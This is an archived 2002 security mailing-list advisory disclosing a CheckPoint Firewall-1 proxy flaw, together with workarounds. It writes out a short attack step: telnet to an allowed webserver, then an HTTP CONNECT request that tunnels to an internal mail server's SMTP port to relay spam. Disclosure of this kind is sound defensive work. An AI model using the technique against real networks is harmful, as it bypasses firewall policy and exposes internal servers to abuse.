CheckPoint FW1 HTTP Security Hole

From: Volker Tanger (volker.tangerat_private)
Date: Tue Feb 19 2002 - 07:05:22 PST

Next message: William D. Colburn (aka Schlake): "*****SPAM***** UPDATE: [wcolburnat_private: SMTP relay through checkpoint firewall]"

Previous message: 'ken'@FTU: "Dino's Webserver v1.2 DoS, possible overflow"
Next in thread: Greg Fraize: "Re: CheckPoint FW1 HTTP Security Hole"
Reply: Greg Fraize: "Re: CheckPoint FW1 HTTP Security Hole"
Reply: Scott Walker Register: "Re: CheckPoint FW1 HTTP Security Hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings!

A quite known proxy vulnerability was found for FW1 V4.1 SP5 (plus
hotfixes) - thanks to Ryan Snyder for announcing the first bits on
Firewall-1 mailing list.

If you connect to a server you are allowed to connect to via HTTP
proxy (e.g. a common rule is "Any / WebServer / http->ressource").
Then use the CONNECT method to connect to a different server, e.g.
an internal mailserver.

Example:
	you = 6.6.6.666
	Webserver = 1.1.1.1
	Internal Mailserver = 2.2.2.2

	Rule allows:  Any  Webserver http->ressource

	connect with "telnet 1.1.1.1 80" to the webserver and enter
	CONNECT 2.2.2.2:25 / HTTP/1.0

	response: mail server banner - and running SMTP session e.g.
	to send SPAM from.

You can connect to any TCP port on any machine the firewall
can connect to. Telnet, SMTP, POP, etc.

Restrictions found:
	- connects are only possible if the firewall module
	  is allowed access (i.e. via policy/properties,
	  specific rules or "Any  (dst) (svc)..." rules
	- you have to allow "CONNECT" - is enabled if you allowed
	  "Tunneling" (General tab) connection method or did not
	  delete the "*" in "Other" Methods (Match tab)

Fast workarounds:
	- Change your ressource settings to filter out CONNECT
	  commands, i.e.
		* disable HTTP tunneling
		* check that "Other" method is specified NOT to
		  match CONNECT (i.e. remove the default wildcard)
	- disallow access from the firewall module (->Properties)
	- replace in all your rules containing the service
	  HTTP+Resource this part with plain HTTP. Yes, you loose

	  some content security but at least you don't compromise

	  your other servers


The thing that really concerns me is, that this general problem has
been known to be an issue with plain HTTP proxies like the Squid since
ages (see e.g. http://www.squid-cache.org/Doc/FAQ/FAQ-10.html#ss10.14).
And why didn't Checkpoint prevent or at least document this?

Puzzled
	Volker

- --

- -------------------------------------------------------------------
volker.tangerat_private                                 discon GmbH
IT-Security Consulting                           Wrangelstrasse 100
http://www.discon.de/                         10997 Berlin, Germany
- -------------------------------------------------------------------
PGP-Fingerprint: 5323 a4f7 a7c2 b8ef 4653 05ce d2ea 2b74  b94c c68e
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (MingW32) - WinPT v0.0.3 (WINNT)
Comment: This is the WinPT config test

iEYEARECAAYFAjxyaZgACgkQ0uordLlMxo6yhQCeIzM/tWK3HCEVM/V816WSFpgh
YhMAoJX/uDKzPE1NKO9XKzizs3sxZWiW
=XumZ
-----END PGP SIGNATURE-----

Next message: William D. Colburn (aka Schlake): "*****SPAM***** UPDATE: [wcolburnat_private: SMTP relay through checkpoint firewall]"
Previous message: 'ken'@FTU: "Dino's Webserver v1.2 DoS, possible overflow"
Next in thread: Greg Fraize: "Re: CheckPoint FW1 HTTP Security Hole"
Reply: Greg Fraize: "Re: CheckPoint FW1 HTTP Security Hole"
Reply: Scott Walker Register: "Re: CheckPoint FW1 HTTP Security Hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 15:44:15 PST